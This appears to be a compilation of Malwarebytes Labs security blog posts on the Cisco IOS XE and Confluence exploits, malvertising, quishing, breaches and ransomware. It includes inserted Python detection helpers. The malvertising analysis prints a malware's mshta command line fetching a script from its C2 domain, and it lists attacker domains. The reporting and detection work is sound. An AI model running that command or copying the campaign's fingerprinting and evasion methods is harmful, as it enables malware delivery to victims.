
Cisco IOS XE vulnerability widely exploited in the wild

An authentication bypass affecting Cisco IOS XE was disclosed on October 16, 2023. Researchers have since found that the vulnerability is being widely exploited in the wild to install implants on affected switches and routers.

Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The vulnerability at hand is listed as:

CVE-2023-20198 (CVSS score 10 out of 10): Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.

What Cisco failed to mention was that thousands of internet-facing IOS XE systems have been implanted. The researchers scanned internet-facing Cisco IOS XE web interfaces and found thousands of implanted hosts.

Cisco has also yet to publish a list of affected devices, but if you are using Cisco switches, routers or Wireless LAN Controllers, you should assume they are vulnerable.

The implants that were found enable the attacker to communicate with the compromised device and use that ability to monitor web traffic, perform lateral movement in the network, or use them for a machine-in-the-middle attack.

The Cisco Talos team discovered there were malicious activities correlated with this vulnerability as early as September 18, 2023.

Mitigation

This vulnerability affects Cisco IOS XE Software if the web UI feature is enabled. The web UI feature is enabled through the ip http server or ip http secure-server commands.

To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. If either command is present, the HTTP Server feature is enabled for the system.

Cisco strongly recommends that customers disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.

While a patch is not yet available, it is advisable to protect your organization by disabling the web interface and removing all management interfaces from the internet immediately, which is always good advice.

The Cybersecurity & Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog, based on the evidence of active exploitation. This means all Federal Civilian Executive Branch (FCEB) agencies have to verify that instances of Cisco IOS XE Web UI are in compliance with BOD 23-02 (Mitigating the Risk from Internet-Exposed Management Interfaces) and apply mitigations per Cisco’s instructions. For affected products (Cisco IOS XE Web UI exposed to the internet or to untrusted networks), organizations must follow Cisco’s instructions to determine if a system may have been compromised and immediately report positive findings to CISA before October 20, 2023.

Organizations should look for unexplained or newly created users on devices as evidence of potentially malicious activity relating to this threat. One method to identify if the implant is present is to run the following command against the device, where the “{DEVICEIP}” portion is a placeholder for the IP address of the device to check:

curl -k -X POST "https://{DEVICEIP}/webui/logoutconfirm.html?logon_hash=1"

Note: The above check should use the HTTP scheme if the device is only configured for an insecure web interface. If the request returns a hexadecimal string, the implant is present.
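The curl check above, as a small Python helper added here (not Cisco's or Malwarebytes' tooling) so it can be run across a list of devices and the verdict recorded: it POSTs to the same path, ignores the certificate as curl -k does, and flags a body that is nothing but hexadecimal digits. The sample response bodies are constructed for illustration.

```python
"""Run Cisco's implant check (POST /webui/logoutconfirm.html?logon_hash=1)
against IOS XE devices and classify the response body."""
import re
import ssl
import urllib.request
from urllib.error import URLError

IMPLANT_PATH = "/webui/logoutconfirm.html?logon_hash=1"

# Constructed sample bodies standing in for the two outcomes described in
# the advisory: a normal web UI answers with an HTML page, the implant
# answers with a bare hexadecimal string.
SAMPLE_CLEAN_BODY = "<html><body>Logout confirmation</body></html>"
SAMPLE_IMPLANT_BODY = "7f3a9c1e2b4d6f8a0c1e3b5d7f9a2c4e\n"


def build_check_url(device_ip: str, secure: bool = True) -> str:
    """Use https:// normally; http:// only for devices that have just
    `ip http server` and no secure-server (the note above)."""
    scheme = "https" if secure else "http"
    return f"{scheme}://{device_ip}{IMPLANT_PATH}"


def looks_like_implant_response(body: str) -> bool:
    """Cisco's indicator: the implant returns a hexadecimal string.
    Require the whole body (ignoring surrounding whitespace) to be hex
    digits so an HTML page or an error message is never flagged."""
    stripped = body.strip()
    return bool(stripped) and re.fullmatch(r"[0-9a-fA-F]+", stripped) is not None


def check_device(device_ip: str, secure: bool = True, timeout: float = 5.0) -> dict:
    """Send the POST and return a structured verdict for one device."""
    url = build_check_url(device_ip, secure)
    # curl -k: do not validate the (typically self-signed) device certificate.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, data=b"", method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            body = resp.read(4096).decode("utf-8", errors="replace")
    except URLError as exc:
        # Unreachable or web UI disabled: no evidence either way, record it.
        return {"device": device_ip, "url": url, "reachable": False,
                "implant": None, "error": str(exc.reason)}
    return {"device": device_ip, "url": url, "reachable": True,
            "implant": looks_like_implant_response(body), "body": body[:64]}


if __name__ == "__main__":
    import sys
    for ip in sys.argv[1:]:
        print(check_device(ip))
```

A positive result is a reason to follow Cisco's advisory and report to CISA, not proof of a clean device when negative: a device that cannot be reached returns implant=None rather than False.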


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

3 crucial security steps people should do, but don’t

Cybersecurity could be as easy as 1-2-3.

The problem, though, is that people have to want it.

In new research conducted by Malwarebytes, internet users across the United States and Canada admitted to dismal cybersecurity practices, failing to adopt some of the most basic defenses for staying safe online. And while some of the fault lies with the public, some also lies with the cybersecurity industry, which, according to the same research, has released products that people do not understand, do not trust, and, most concerningly, do not use for their intended benefits.

For our latest report, “Everyone’s afraid of the internet and no one’s sure what to do about it,” we surveyed 1,000 people, aged 13 to 77, about their cybersecurity and online privacy beliefs and behaviors. When asked specifically about the tools and methods that people use to protect themselves online, we found, disappointingly, that:

  • Just 35 percent of people use antivirus software.
  • Just 24 percent of people use multi-factor authentication.
  • Just 15 percent of people use a password manager.
  • Just 35 percent of people have unique passwords for most or all of their accounts.

There’s no denying the ugly truth here: These numbers are too low.

Optimistic interpretations do exist—perhaps some members of the public unknowingly have antivirus protections on their devices or they perhaps use device-provided password managers without knowing the name of the technology behind it—but other statistics point to a lack of trust and a high rate of apathy towards cybersecurity defenses overall.

For everyone interested in meaningful, simple cybersecurity, here are three things you can do right now.

1. Create and store unique passwords for each account with the help of a password manager

Strong passwords are a two-part problem: They must be unique for every online account, and they must be remembered.

Creating strong, unique passwords is simple enough, as any person can throw a cat at a keyboard and likely fulfill the password requirements for most online accounts. Uppercase and lowercase letters? Special characters? Numbers? No addresses, pet names, or usernames? These specifications are no match for “vn;aeo&d8ey38dD” (No cats were harmed in the creation of this password).

But remembering that password—and remembering every password like it—is physically impossible, as the number of online accounts and associated passwords that the average person can recall from memory is just a handful.

In fact, there is plenty of research showing that people have trouble remembering unique passwords for just 13 separate accounts, and that people have far more trouble remembering 4 – 6 passwords than 1 – 3.

But the modern internet doesn’t care about mental limitations. Instead, it demands an increasing number of accounts and passwords to manage for each person. According to research from the password manager LastPass, the average small business user has 85 passwords, and according to older research in 2015 from another password manager, Dashlane, an average user then had at least 90 accounts.

The results of this constant tension are reflected in Malwarebytes’ latest report:

  • 24 percent use the same password, if possible, across all or most accounts
  • 41 percent have a few passwords they use across accounts

The most obvious solution to this first part of the password problem, then, is a password manager. Password managers can create and store strong, unique passwords for all your accounts, and they can interact directly with web browsers so that you don’t need to individually open the password manager app every time you log into a service.

Unfortunately, Malwarebytes’ research shows that password manager use is exceedingly low:

  • 15 percent of all respondents use a password manager
  • 9 percent of Gen Z respondents use a password manager
  • 18 percent of non-Gen Z respondents use a password manager

Get a password manager and start using it specifically to create and store unique passwords across all your accounts. You physically cannot practice strong password security without one (unless you go the paper-and-pencil route, which is an entirely different conversation).

But once you have a password manager, don’t stop there…

2. Use multi-factor authentication (MFA)

There are two statistics that matter for multi-factor authentication (MFA).

The first statistic was released in 2019, when Microsoft’s Group Program Manager for Identity Security and Protection Alex Weinert said: “Based on our studies, your account is more than 99.9 percent less likely to be compromised if you use MFA.”

The second statistic was released this month, when Malwarebytes found that only 24 percent of people use MFA. That number drops to 16 percent for Gen Z.

MFA tackles the problem of password abuse in a very different way than password managers and password creation.

MFA does not care if your password sucks. MFA will not make you use any special characters or numbers or uppercase or lowercase letters. MFA doesn’t require you to “remember” anything.

Instead, MFA stands between your account and the abuse of your password by requiring you to enter another form of authentication—other than a password—to log in. That means that even if a cybercriminal has your login information for your bank, that alone would not be enough to gain access. Instead, your bank would ask for a second form of authentication, which is typically a six-digit passcode that is sent to your device through a text message or email, or it is generated by your device with a separate app. Once you enter that passcode, only then are you allowed entry.

MFA is available on nearly every single critical type of online account today, and it should be used for the services that hold your most sensitive information, including your email, social media, and online banking.

3. Use antivirus

Ask a cybersecurity writer (me) how it feels to learn that just 35 percent of people use antivirus and you’ll hear an answer: “Not great.”

Ask the same cybersecurity writer how it feels to learn that just 17 percent of Gen Z use antivirus and you’ll hear a different answer: “Ah, sh*t.”

The public are not entirely to blame. As Malwarebytes discovered in its latest report, it is not that the public do not care about cybersecurity and online threats—it is that they do not know entirely how to stay safe, or how cybersecurity tools protect them.

As Malwarebytes found:

  • 41 percent agreed or strongly agreed with the statement: “I don’t fully understand how different cybersecurity products can protect me.”
  • 37 percent agreed or strongly agreed with the statement: “Cybersecurity products only really help with things like viruses and malware.”
  • 25 percent agreed or strongly agreed with the statement “There’s no point in using cybersecurity products since there are too many online threats.”

The cybersecurity industry should learn from this. We are failing to speak plainly about security tools, failing to explain how malware can be detected through its delivery in malicious websites that are blocked by online tools like BrowserGuard, and failing to show how digital consequences, like account compromise, identity theft, and credit card fraud, are strictly connected to well-known threats like credential stuffing and data theft. 

Particularly upsetting is that sometimes, even the users of online security and privacy tools have the wrong impression about those tools.

As Malwarebytes found, 22 percent of people use a VPN specifically to “help stop viruses/malware from getting on my device”—a function that VPNs do not provide. (In rare circumstances, some malware avoids detonation based solely on IP addresses, but that is an exception for the average user.)

Antivirus works. We know you may consider Malwarebytes a biased speaker, but the fact still stands. Every year, Malwarebytes detects and removes millions of viruses, Trojans, adware infections, monitoring tools, and more from user devices around the world. Importantly, behind nearly every detection is an attempt to harm you, the user. 

Don’t fall for the easy path of apathy. Take three simple steps to stay safe.


The US wants governments to commit to not paying ransoms

As the White House prepares to host its annual International Counter Ransomware Initiative (CRI) summit, Bloomberg reports that the US is pushing other countries to stop paying ransoms to cybercriminals.

The CRI wants to enhance international cooperation to combat the growth of ransomware, and its 47 members will convene in Washington for its annual summit on October 31, 2023.

“The work of the CRI supports the implementation of the endorsed UN framework for responsible state behavior in cyberspace, specifically the voluntary norm that States should cooperate to exchange information, assist each other, prosecute terrorist and criminal use of ICTs and implement other cooperative measures to address such threats.”

White House Deputy National Security Adviser Anne Neuberger said ransomware payment bans have been a topic of discussion among members of the CRI, and she noted that several other countries have also raised the issue, but no decisions have been made.

The reasoning is very understandable. Ransomware has grown to be a formidable industry over the years and if it were possible to stop the cashflow in that direction, it would soon collapse. Not only would the seasoned criminals turn to other sources of income, the entry-level jobs would disappear and the funds for research into new tactics would dry up.

If an agreement is reached, this would only bind government organizations, but even that could potentially have a large impact. Other experts believe that the energy spent on achieving this would be more effectively spent on helping less well-equipped governments improve their cyber-defenses.

If we could eliminate the low-effort attacks on long-known vulnerabilities where patches are available but unapplied, this could have at least the same kind of impact.

And to be fair, several US states have banned local government entities from paying ransoms connected to attacks. So far, this really hasn’t stopped them from being targeted. In 2021, the FBI even advised against making ransom payments illegal because it would only open up another avenue of extortion.

One might think that now that most organizations have their backup strategies sorted out, it shouldn’t be too hard to convince victims not to pay the ransom. Unfortunately, many ransomware gangs have adopted the double extortion strategy, where stolen data extracted from the victim’s systems during the attack is used as extra leverage. And when sensitive data is stolen, having a backup does not take away the threat.

Also, it’s not fair to think that all government organizations in the member states have their security and backup strategy at the required level to safely survive a ransomware attack. But we feel it is true that they should be setting an example by investing in their security posture and by refusing to pay the criminals.

Neuberger said that she would like participating governments to publicly commit to not make ransom payments, but if members can’t agree to the statement in advance of the meeting, then it will be included as a discussion point.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly, and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A week in security (October 9 – October 15)

Last week on Malwarebytes Labs:

Stay safe!



Customer data stolen from gaming cloud host Shadow

Cloud infrastructure provider Shadow has warned of the data theft of over 500,000 customers. The customers were informed by a breach notification which was posted online.

Shadow is known in the gaming world and, among other things, allows gamers to play resource-heavy games on lower-end devices.

The stolen data includes full customer names, email addresses, dates of birth, billing addresses, and credit card expiration dates. According to Shadow, no passwords or sensitive banking data have been compromised.

Shadow says the incident happened at the end of September, and was the result of a social engineering attack on a Shadow employee. The attack began on the Discord platform after the employee downloaded malware he believed to be a game on the Steam platform.

Shadow says that despite swift countermeasures, the attackers were able to use one or more of the cookies they had stolen in order to connect to the management interface of one of Shadow’s SaaS providers. From there the attackers were able to steal the data from Shadow by using their Application Programming Interface (API) access.

According to BleepingComputer, a cybercriminal claiming responsibility for the attack is selling the stolen database on a well-known hacking forum.

message on hacking board offering data for sale

image courtesy of BleepingComputer

In the message, the cybercriminal says IP connection logs were also stolen in the breach in addition to the other data mentioned by Shadow.

It is unclear, although likely, whether Shadow has reached out to everyone involved. Shadow recommends that users set up multi-factor authentication (MFA) on their accounts, and watch out for any emails that appear to come from Shadow, as they could be phishing attempts.

The company is also telling users to contact customer service with any questions or concerns.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable multi-factor authentication (MFA). This is good advice from Shadow, and something we always advise. If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of multi-factor authentication can be phished just as easily as a password. MFA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
  • Take your time. As Shadow warns, phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The forgotten malvertising campaign

In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.


Malicious ads for Notepad++

The threat actor is running a campaign targeting Notepad++, a popular text editor for Windows as well as similar software programs such as PDF converters. The image below is a collage of malicious ads we observed recently, all run by the same threat actor but via different ad accounts, likely compromised.


A first level of filtering happens when the user clicks on one of these ads. This is likely an IP check that discards VPNs and other non-genuine IP addresses and instead shows a decoy site.

However, intended targets will see a replica of the real Notepad++ website hosted at notepadxtreme[.]com:

Fingerprinting for VM detection

A second level of filtering happens when the user clicks on the download link where JavaScript code performs a system fingerprint. We had previously observed some malvertising campaigns check for the presence of emulators or virtual machines and this is what happens here also, although the code being used is different and more complex.


If any of the checks don’t match, the user is redirected to the legitimate Notepad++ website. Each potential victim is assigned a unique ID that will allow them to download the payload.

Custom, time-sensitive download

Another thing that sets apart this campaign from others is the way the payload is being downloaded. Each user is given a unique ID with the following format:

CukS1=[10 character string][13 digits]

This is likely for tracking purposes but also to make each download unique and time sensitive.

Unlike other malvertising campaigns, the payload is a .hta script. It follows the same naming convention seen above with the download URL:

Notepad_Ver_[10 character string][13 digits].hta

Attempting to download the file again from the same URL results in an error.

.HTA Payload

The .hta file we captured during our investigation was not fully weaponized. However, we were able to find another one that was uploaded to VirusTotal in early July. It uses the same naming convention and we can see the lure was “PDF Converter” instead of Notepad++.


The script is well obfuscated and shows 0 detection on VirusTotal. However, upon dynamic analysis, there is a connection to a remote domain (mybigeye[.]icu) on a custom port:

C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe"
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

We also notice it uses the same client_id stored in the filename when making that remote connection.
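A detection helper added here (not the campaign's code nor Malwarebytes' tooling) for the naming convention described in this section: it matches the Notepad_Ver_[10 character string][13 digits].hta filename and the matching client_id parameter in web proxy logs and correlates the two by their shared identifier. The reading of the 13 digits as a Unix timestamp in milliseconds is an assumption made for this example; the log lines are constructed, with the domains and client_id taken from the post.

```python
"""Find the campaign's tracking identifier in proxy logs: the .hta download
name and the client_id callback share one <10 letters><13 digits> value."""
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Ten lowercase letters followed by thirteen digits, as in the client_id
# jurmvozdcf1687983013426 quoted from the mshta command line above.
TRACKING_ID = re.compile(r"(?P<tag>[a-z]{10})(?P<ts>\d{13})")
HTA_NAME = re.compile(r"Notepad_Ver_(?P<id>[a-z]{10}\d{13})\.hta$")

# Constructed proxy-log lines: "<time> <client> <method> <url> <status>".
# The hosts, times and the download path are made up for the example.
SAMPLE_PROXY_LOG = """\
2023-07-01T09:12:44Z host-17 GET https://www.notepad-plus-plus.org/downloads/ 200
2023-07-01T09:13:02Z host-17 GET https://notepadxtreme.com/dl/Notepad_Ver_jurmvozdcf1687983013426.hta 200
2023-07-01T09:13:09Z host-17 GET https://mybigeye.icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426 200
2023-07-01T09:15:30Z host-22 GET https://example.com/report_2023.pdf 200
"""


def parse_tracking_id(value: str):
    """Split an identifier of the campaign's shape into its letter tag and
    the decoded timestamp (assumed: Unix epoch in milliseconds)."""
    m = TRACKING_ID.fullmatch(value)
    if not m:
        return None
    ts = datetime.fromtimestamp(int(m.group("ts")) / 1000, tz=timezone.utc)
    return {"tag": m.group("tag"), "timestamp": ts}


def classify_url(url: str):
    """Return a hit for the .hta download name or the client_id callback,
    otherwise None. The URL fragment (after #) is ignored by urlsplit."""
    parts = urlsplit(url)
    name = HTA_NAME.search(parts.path.rsplit("/", 1)[-1])
    if name:
        info = parse_tracking_id(name.group("id"))
        return {"kind": "hta_download", "host": parts.hostname, **info}
    for cid in parse_qs(parts.query).get("client_id", []):
        info = parse_tracking_id(cid)
        if info:
            return {"kind": "client_id_callback", "host": parts.hostname, **info}
    return None


def scan_log(text: str):
    """Scan whitespace-separated log lines; each hit keeps the client and
    time so the download and its callback can be tied together by tag."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        found = classify_url(fields[3])
        if found:
            hits.append({"when": fields[0], "client": fields[1], **found})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_PROXY_LOG):
        print(hit)
```

The decoded timestamp of the quoted client_id falls in late June 2023, which fits the early-July VirusTotal upload mentioned below if the millisecond-timestamp assumption holds.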

While we don’t know what happens next, we believe this is part of malicious infrastructure used by threat actors to gain access to victims’ machines using tools such as Cobalt Strike.

Innovation makes malvertising a greater threat

We have observed an increase in the volume of malvertising campaigns but also in their sophistication over the past several months. Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims.

With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads. This is another space where we see some innovation and where security vendors are currently running behind.

Threat intelligence is a critical part of a defensive strategy to better understand the threat landscape in order to protect users. For example, tracking malicious ads allows us to quickly identify the infrastructure used by threat actors and immediately block it. Following the malware delivery chain shows us any new techniques that may bypass current security products and helps us to adjust our detections accordingly.

Indicators of Compromise

Ad domains:

switcodes[.]com
karelisweb[.]com
jquerywins[.]com
mojenyc[.]com

Fake Notepad++ site:

notepadxtreme[.]com

Script C2:

mybigeye[.]icu


Explained: Quishing

Quishing is phishing using QR (Quick Response) codes. QR codes are basically two-dimensional barcodes that hold encoded data, and they can be used to work as a link. Point your phone’s camera at a QR code and it will ask you if you want to visit the link.

The use of QR codes in malicious campaigns is not new, and because they can provide contactless access to a product or service they grew in popularity during the Covid-19 pandemic.

In August 2023, we wrote about an email campaign that used QR codes to phish for Microsoft credentials. The links in the QR codes redirected from legitimate domains associated with Bing, Salesforce, and Cloudflare to send the targets to phishing sites that were after Microsoft credentials. Since the subjects of the emails were often fake Microsoft security notifications, the Bing URLs would not have looked out of place to any victims who gave them a cursory examination.

Lately, there has been an increase in quishing emails, which either send victims to malware-infested sites or ones looking for credentials. 

The usual methods are used to make the emails look convincing: The email will pretend to come from a bank or another organization you trust, or might look like internal mails from the organization you work for, perhaps pretending to come from HR or the IT department. The QR codes in these mails are either embedded or sent as an attachment.

Most of these emails contain little to no text, which reduces the chances of the scammer making a mistake and gives spam filters less to read. The message is displayed in an image, which also helps the email get through spam filters.

Example

I personally received a quishing mail pretending to be from the KVK (the Dutch Chamber of Commerce), telling me I had to request a digital key within the next 3 days or my company would be registered as inactive.

phishing mail with a QR code

As you can see, a lot of the normal signs by which we can recognize a phishing mail are there:

  • Urgency
  • A link leading to a site to fill out personal information
  • Sloppy lay-out of the mail

I was also able to recognize it as false because the sender address didn’t belong to the organization it claimed to be from.

The QR code contained a link to the lihi1.com URL shortener which pointed me to a clone of the KVK site.

screenshot of the phishing site form

It asked for my name, birth date, address, mobile phone number, my KVK registration number and my bank account number. A successful phisher can probably sell that data for a few bucks on the dark web.

To stay safe from quishing, you can follow the same advice we provide for phishing, because that’s what it is. It’s just that the method to obfuscate the phishing site is a bit more sophisticated, which also makes the use of it more suspicious.

One extra measure you can take is to install a QR code scanner that doesn’t take you to the destination in the URL, but displays it for you, so you can decide whether you want to proceed.

Stay alert for hallmarks of phishing campaigns, such as a sense of urgency and appeals to your emotions. Be extremely wary if a QR code takes you to a site that asks for personal information, login credentials or payment.



Update now! Atlassian Confluence vulnerability is being actively exploited

Microsoft Threat Intelligence has revealed that it has been tracking the active exploitation of a vulnerability in Atlassian Confluence software since September 14, 2023. At the time the attacks were first observed the vulnerability was a zero-day, meaning that no update was available, so defenders had “zero days” to patch the flaw.

The vulnerability has since been issued an ID, CVE-2023-22515, and rated with the highest possible severity, a CVSS score of ten. Atlassian’s October 4 advisory warns that “Publicly accessible Confluence Data Center and Server versions … are at critical risk and require immediate attention.”

If you are running Confluence Data Center or Confluence Server inside your organisation and it’s exposed to the public internet you should take steps to prevent exploitation, upgrade your software and look for evidence of compromise (take a look at the Atlassian advisory for detailed information about threat hunting).

Versions of Atlassian Confluence before 8.0.0 are not vulnerable. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. The fixed versions of Confluence are 8.3.3 or later, 8.4.3 or later, and 8.5.2 or later.

CVE-2023-22515 is a broken access control vulnerability that allows an attacker with network access to the server to create unauthorized Confluence administrator accounts and access Confluence instances. If your Confluence software is on the public internet, then the attacker has network access over the internet.

On October 10, 2023, Atlassian updated its advisory to say that it has “evidence to suggest that a known nation-state actor is actively exploiting CVE-2023-22515”.

On the same day, Microsoft Threat Intelligence took to X (formerly Twitter) to say that an actor it tracks as Storm-0062, which it believes to be a nation-state actor working on behalf of China, had been exploiting CVE-2023-22515 since mid-September.

Although the vulnerability started as a zero-day in the hands of nation state hackers, it will likely take on a second life in the hands of less sophisticated criminals.

We are now in the “patch gap,” the period of time between a patch being available and it being applied. This creates a window of opportunity for mass exploitation, which could last months or even years. The arrival of a patch allows organisations to fix their systems, but it also informs a wider group of criminals about the existence of the vulnerability. Criminals and researchers can then reverse engineer the patch to identify the problem, and then create their own code to exploit it, or wait for others to do it for them.

Proof-of-concept exploits for CVE-2023-22515 have already appeared on GitHub, so there is no time to lose. How long the patch gap lasts is entirely down to how quickly organisations update their Confluence software. History suggests organisations may struggle to find the speed required. For example, one of 2022’s most routinely exploited vulnerabilities was CVE-2021-26084, a remote code execution flaw in Confluence that was discovered in the middle of the previous year.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Giant health insurer struck by ransomware didn’t have antivirus protection

The Philippine Health Insurance Corporation (PhilHealth), has confirmed that it was unprotected by antivirus software when it was attacked by the Medusa ransomware group in September.

Antivirus software, or more correctly its modern descendants endpoint security and Endpoint Detection and Response (EDR), is an essential tool in the battle against cybercrime. EDR can detect an intruder’s suspicious activity in advance of them running ransomware, as well as being able to identify the ransomware itself.

Because of this, ransomware groups, who can spend days or even weeks setting up an attack inside a compromised network, will typically try to disable antivirus software.

GMA News reports that PhilHealth confirmed the lack of antivirus on its news programme, 24 Oras:

In Mark Salazar’s report on “24 Oras” on Monday, PhilHealth confirmed that its antivirus software had expired on April 15, but that it had not been able to renew its subscription immediately due to complicated government procurement processes.

PhilHealth is the government-owned and -controlled corporation that provides universal health coverage in the Philippines. It was attacked on September 22, 2023.

According to a recent post on its Facebook account, all of the corporation’s public-facing applications have been back online since October 6, 2023, including “the website, Member Portal, eClaims for electronic submission of hospital claims, and EPRS for employer remittances.”

The organisation deserves praise for recovering its systems swiftly and for refusing to pay the ransom demand, which is reported to be around $300,000. In response, the Medusa ransomware group has made data stolen in the attack available for download on its dark web leak site, saying the “Company came to the tor chat but didn’t answer for the payment yet.”


Filipino news site Rappler reports that almost 750 gigabytes of information was stolen from PhilHealth, and the number of PhilHealth members affected is in the “millions”.

Their data is now available for download on the dark web. PhilHealth warns that members are likely to be “victimized by opportunists” who can use the information to create targeted and believable social engineering attacks.

In response, PhilHealth “strongly recommends changing passwords of online accounts, enabling multi-factor authentication, monitoring of suspicious activities in their online accounts, not opening and clicking suspicious emails and links, and not answering suspicious calls and text messages”.

The attack is a great example of how ransomware attacks aren’t really about computers, they are about the effects they have on people. Despite expending a lot of hot air on the subject, ransomware groups have shown time and again that they are absolutely not above targeting the healthcare sector. As the attack on Ireland’s Health Service Executive in 2021 showed, attacks on healthcare can create uncertainty, delays, enormous stress and legal jeopardy for staff, and the very real risk of pain, physical harm and even death for patients.

In the twelve months between October 2022 and September 2023, there were 213 known attacks against the healthcare sector, making it the ninth most attacked sector globally. More than half of those attacks occurred in the USA, where healthcare was the third most attacked sector, suggesting it may be targeted deliberately in the USA rather than opportunistically.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.


CISA catalog passes 1,000 known-to-be-exploited vulnerabilities. Celebration time, or is it?

On September 18, 2023, the Cybersecurity & Infrastructure Security Agency (CISA) announced that its Known Exploited Vulnerabilities (KEV) catalog has reached the milestone of covering more than 1,000 vulnerabilities since its launch in November 2021.

This may seem like a lot, but with over 25,000 new vulnerabilities published in 2022 alone, a list of around 1,000 helps organizations focus on the vulnerabilities that matter the most.

Many organizations are running a plethora of software and internet-facing devices, and vulnerabilities that can be used to exploit them are found every day. Everybody knows they need to patch, but deciding what to patch when, and then finding the time and resources to do it, are significant challenges.

CISA says that one of the reasons to launch the KEV catalog was to help organizations prioritize which vulnerabilities to address first.

“As a starting point, we know that the majority of vulnerabilities are never exploited by malicious actors.”

CISA issued Binding Operational Directive 22-01 in November 2021, which established the catalog and bound everyone operating federal information systems to abide by it.

Federal Civilian Executive Branch (FCEB) agencies are handed specific—and very tight—deadlines for when vulnerabilities must be dealt with. Specifically, the Directive requires those agencies to remediate internet-facing listed vulnerabilities within 15 days and all others within 25 days. 

For everyone else it’s an opportunity to filter vulnerabilities by something even more relevant than CVSS scores, in which the exploitability of a vulnerability is only a sub-score.

Because it’s based on what criminals are actually exploiting, your organization might still want to feed the catalog into its patch management strategy.
